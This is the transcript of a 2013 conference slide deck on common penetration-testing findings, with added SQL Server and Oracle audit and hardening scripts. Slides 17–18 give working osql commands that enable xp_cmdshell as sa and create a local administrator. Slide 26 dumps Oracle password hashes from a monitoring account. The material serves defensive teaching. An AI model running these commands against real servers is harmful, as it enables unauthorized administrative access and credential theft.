
1 CarolinaCon 9 The Low Hanging Fruit of Penetration Testing Presented by: Bryan Miller

2 Agenda (3/16/2013)
- Pen Testing vs. VA vs. Risk Assessments
- Penetration Testing Concepts/Issues
- What is Low Hanging Fruit
- Low Hanging Fruit Examples
- Wrap Up

3 Bryan Miller
- B.S. I.S., M.S. C.S. – Virginia Commonwealth University
- Current CISSP, former Banyan CBE & Cisco CCIE
- Former adjunct professor – I.S. & C.S. – VCU
- ISSA, ISACA, IALR and VA SCAN lecturer
- Penetration testing for 11+ years
- Published author with 25 years in I.T.

4 Penetration Testing vs. Vulnerability Assessments vs. Risk Assessments

5
- Penetration Testing
  - Tests for actual vulnerabilities and confirms what can be exploited
  - The value add comes from putting the pieces together: chaining findings that look minor on their own
- Vulnerability Assessment
  - Reports on potential vulnerabilities without exploiting them
  - Assigns a risk value to each issue
- Risk Assessment
  - More analytical and less technical
  - Great for overviews but IMHO it will never catch LHF

6 Penetration Testing Concepts/Issues

7 Types of testing
- External
  - Testing from outside the security perimeter (firewall)
  - Internet, dial-in, wireless, physical & social engineering
  - Usually performed in a black-box approach with no credentials

8 Types of testing
- Internal
  - What is accessible inside the security perimeter
  - White-box or black-box depending on goals
  - Tests for the effects of automated malicious software

9 Issues - Requirements definition
- Do you need a penetration test, VA or risk assessment?
  - Sometimes you may need more than one
- What is the ultimate goal of the test?
  - Physical → Test security cameras, locks and alarms
  - Social Engineering → Test HR policies and procedures
  - Vulnerability Assessment → Patch scan
- How do you define success?
  - How do you know if the test succeeded or failed?
  - Sometimes difficult to define for a penetration test

10 Issues - In-house or outsourced?
- In-house
  - Keeping qualified staff happy is a tough job
  - Tools and training can be very expensive
  - Sometimes you just need an unbiased 2nd opinion
- Outsourced
  - How do you judge competency?
  - Do they have a methodology, tool list, references?
  - Do they outsource their work?
  - Geography/vertical market coverage

11 Issues
- Deliverables
  - Will the report include specific recommendations?
  - Is there tool output for verification?
  - No boilerplate text!
- Remediation
  - If you don’t plan on fixing the issues, don’t waste the time or money performing the tests
- Post-remediation testing
  - Critical to ensure that all issues have been resolved

12 What is Low Hanging Fruit?

13-14 The Low Hanging Fruit Top Ten
1. Password management
2. Default security controls
3. OS and application patches
4. SQL Injection, XSS, URL issues
5. Wireless access points/modems
6. Permissions on data resources
7. Employee security awareness
8. Encryption
9. Policies & procedures
10. Physical security

15 Low Hanging Fruit Examples


17 Fun with Microsoft SQL
- Turn on "xp_cmdshell" if it’s disabled. The sequence authenticates as sa, so it already assumes a weak, default or cracked sa password; osql is deprecated, but sqlcmd takes the same -S/-U/-P/-Q switches.
    osql -S 10.1.1.1 -U sa -P pwd -Q "EXECUTE master.dbo.sp_configure 'show advanced options', 1"
    osql -S 10.1.1.1 -U sa -P pwd -Q "RECONFIGURE"
    osql -S 10.1.1.1 -U sa -P pwd -Q "EXECUTE master.dbo.sp_configure 'xp_cmdshell', 1"
    osql -S 10.1.1.1 -U sa -P pwd -Q "RECONFIGURE"

18 More Fun with Microsoft SQL
- Add an administrative user. xp_cmdshell runs the command under the SQL Server service account, so this step succeeds only when that account is a local administrator (LocalSystem, or a domain account that was granted admin rights), which is exactly the misconfiguration being demonstrated.
    osql -S 10.1.1.1 -U sa -P pwd -Q "EXECUTE xp_cmdshell 'net user bmiller passwd /add'"
    osql -S 10.1.1.1 -U sa -P pwd -Q "EXECUTE xp_cmdshell 'net localgroup administrators bmiller /add'"
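Added example, not from the talk: a T-SQL audit and hardening script for the xp_cmdshell path the two slides above walk through. It answers the questions a defender (or a tester writing the remediation section) needs: is xp_cmdshell on, who could turn it on, is sa still enabled under its well-known name, and which Windows account those shelled-out commands would run as. Everything queried is a standard SQL Server catalog view or DMV (sys.configurations, sys.server_principals, sys.dm_server_services; the last needs SQL Server 2008 R2 SP1 or later). The renamed-sa login name at the end is a placeholder to replace with your own.

```sql
-- Added example (not from the talk). Run as a sysadmin via SSMS or sqlcmd.

-- 1. Is xp_cmdshell enabled right now?  value_in_use = 1 means yes.
SELECT name, value, value_in_use
FROM   sys.configurations
WHERE  name IN ('xp_cmdshell', 'show advanced options');

-- 2. Who could enable it?  sp_configure needs sysadmin or serveradmin, so list those members.
SELECT sp.name AS login_name, sp.type_desc, sp.is_disabled
FROM   sys.server_principals AS sp
WHERE  IS_SRVROLEMEMBER('sysadmin',    sp.name) = 1
   OR  IS_SRVROLEMEMBER('serveradmin', sp.name) = 1;

-- 3. Is the built-in sa login still enabled and still called sa?  principal_id 1 is always sa,
--    whatever it has been renamed to, so this also catches a renamed-but-enabled sa.
SELECT name, is_disabled, modify_date
FROM   sys.server_principals
WHERE  principal_id = 1;

-- 4. Which Windows identity would xp_cmdshell commands run as?  If service_account is
--    LocalSystem or a local/domain admin, the "net user ... /add" on slide 18 works.
SELECT servicename, service_account, startup_type_desc
FROM   sys.dm_server_services;          -- SQL Server 2008 R2 SP1 and later

-- 4b. The tester's view of the same question, if xp_cmdshell is already on:
--     EXEC master.dbo.xp_cmdshell 'whoami';

-- 5. Hardening: turn xp_cmdshell off again, re-hide advanced options, then disable and
--    rename sa so brute-force tools lose their default target.
EXEC master.dbo.sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC master.dbo.sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC master.dbo.sp_configure 'show advanced options', 0;
RECONFIGURE;

ALTER LOGIN sa DISABLE;
ALTER LOGIN sa WITH NAME = [svc_admin_renamed];   -- placeholder name: pick your own
```

Disabling xp_cmdshell is a speed bump, not a fix: any sysadmin login can re-enable it with the four osql lines on slide 17. The durable controls are steps 2 through 4: few sysadmin members, no sa with a guessable password, and a service account that is not a local administrator, so that even a re-enabled xp_cmdshell cannot create admin users.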

19 The Trouble with VNC

20 There are many ways to get the VNC password hashes… (and they are not really hashes: classic VNC servers store the password DES-encrypted under a fixed, published key, in the registry on Windows or in ~/.vnc/passwd on Unix, so any copy of that 8-byte value yields the plaintext instantly)

26 Fun with Oracle
- Dumping password hashes – non-privileged account
  1. Logged in as "dbsnmp", we ran the following query:
       select username, password from dba_users;
     DBSNMP   AE1E40C725DFCAC8
     AQADMIN  739EF27E22AC39DC
     SYS      C10A280B9CFF9A72
     SYSTEM   04D19DEFD642AF20

27 2. Ran CheckPWD:
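Added example, not from the talk: the defender-side follow-up to the two Oracle steps above. DBSNMP is the Enterprise Manager monitoring account; in 10g it shipped with the password DBSNMP and the OEM_MONITOR role, which carries SELECT ANY DICTIONARY, and that single privilege is why a "non-privileged" login can read the hash column of DBA_USERS. The script lists who holds dictionary access, finds accounts still on vendor default passwords, shows where the hashes live on 11g and later, and locks things down. The views and syntax are standard Oracle (DBA_USERS_WITH_DEFPWD needs 11g or later; step 1 resolves one level of role nesting only); the password literal and the revoked grantee name are placeholders.

```sql
-- Added example (not from the talk). Run as SYSDBA.

-- 1. Who can read the data dictionary?  DBA_USERS is a SYS view, so SELECT ANY DICTIONARY
--    (directly, or through a role such as OEM_MONITOR) or SELECT_CATALOG_ROLE is enough.
SELECT grantee, privilege, 'direct' AS via
FROM   dba_sys_privs
WHERE  privilege = 'SELECT ANY DICTIONARY'
UNION ALL
SELECT rp.grantee, sp.privilege, 'role ' || rp.granted_role
FROM   dba_role_privs rp
JOIN   role_sys_privs sp ON sp.role = rp.granted_role
WHERE  sp.privilege = 'SELECT ANY DICTIONARY'
UNION ALL
SELECT grantee, 'SELECT_CATALOG_ROLE', 'role'
FROM   dba_role_privs
WHERE  granted_role = 'SELECT_CATALOG_ROLE'
ORDER  BY 1;

-- 2. Accounts still using a vendor default password (DBSNMP/DBSNMP is the classic case).
SELECT username
FROM   dba_users_with_defpwd
ORDER  BY username;

-- 3. Where the hashes actually live.
--    Pre-11g: DBA_USERS.PASSWORD holds the 16-hex-character DES-based hash shown on slide 26.
--    It is case-insensitive and salted only by the username, which is why CheckPWD gets through
--    it so quickly.  11g+: DBA_USERS.PASSWORD is blank and the hashes sit in SYS.USER$
--    (PASSWORD = the legacy DES hash if still kept, SPARE4 = the 'S:' SHA-1 based hash).
--    A populated PASSWORD column here means the weak legacy hash is still being stored.
SELECT name, password, spare4
FROM   sys.user$
WHERE  type# = 1                         -- 1 = user, 0 = role
AND    name IN ('SYS', 'SYSTEM', 'DBSNMP', 'AQADMIN');

-- 4. Lock down: unused default accounts locked and expired, DBSNMP on a real password,
--    and dictionary access removed from anything that does not need it.
ALTER USER aqadmin ACCOUNT LOCK PASSWORD EXPIRE;
ALTER USER dbsnmp IDENTIFIED BY "Str0ng-Monitoring-Pw!";      -- placeholder: choose your own
REVOKE SELECT ANY DICTIONARY FROM some_app_user;               -- placeholder grantee from step 1
```

Step 1 is the one to run first on an engagement: every grantee it returns can repeat the slide-26 query, so an application account with a guessable password on that list is the same finding as DBSNMP, just with a different name.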

28 Reboot via Compaq Insight Manager (CIM)

34 Appliances are not immune…

35 Downloaded passwd, shadow, host files

45 Looks like we can request any file?

46 OK, we’ll ask for the password file. Next up, JTR!

47 This is why PCI doesn’t allow WEP

48 What the fake telephone repairman saw…

49 The danger of scripts lying around…

50 Wrap-Up

51
- Data breaches affect your organization’s reputation and can cost you money.
- Software is becoming more complex while attacker tools are becoming easier to use.
- Data breaches can be reduced by following best-practice rules to eliminate LHF.

52 Remember the 3 P’s:
- Policies & Procedures
- Password Management
- Patching

53 Q&A – Bryan Miller, bryan@syrinxtech.com

